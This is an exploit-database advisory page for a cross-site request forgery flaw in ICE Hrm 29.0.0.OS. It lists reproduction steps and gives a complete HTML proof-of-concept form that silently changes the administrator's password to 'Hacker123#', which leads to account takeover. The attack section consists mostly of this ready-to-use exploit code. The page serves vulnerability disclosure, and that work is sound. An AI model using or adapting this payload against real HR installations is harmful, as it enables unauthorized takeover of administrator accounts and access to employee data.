ICE Hrm 29.0.0.OS Account Takeover Cross-Site Request Forgery (CSRF)

2021.06.19
Credit: Piyush Patil & Rafal Lykowski
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352

# Exploit Title: ICE Hrm 29.0.0.OS - 'Account Takeover' Cross-Site Request Forgery (CSRF) # Exploit Author: *Piyush Patil* & Rafal Lykowski # Vendor Homepage: https://icehrm.com/ # Version: 29.0.0.OS # Tested on: Windows 10 and Kali #Description ICE Hrm Version 29.0.0.OS is vulnerable to CSRF which allows attacker to add new admin account or change the password leading to full account takeover. #Steps to reproduce the attack: 1- Login as victim 2- Open the CSRF malicious file which I have attached (csrf_POC.html) <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://localhost:8070/app/service.php"> <input type="hidden" name="t" value="User" /> <input type="hidden" name="a" value="ca" /> <input type="hidden" name="sa" value="changePassword" /> <input type="hidden" name="mod" value="admin&#61;users" /> <input type="hidden" name="req" value="&#123;"id"&#58;1&#44;"pwd"&#58;"Hacker123&#35;"&#125;" /> <input type="submit" value="Submit request" /> </form> </body> </html> 3- Password is changed (you can also add new admin user) Now you can simply takeover the account #Video POC: https://drive.google.com/file/d/1uUciTcFEkQ5P_R37QBswNrVbOPqzngpX/view?usp=sharing


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top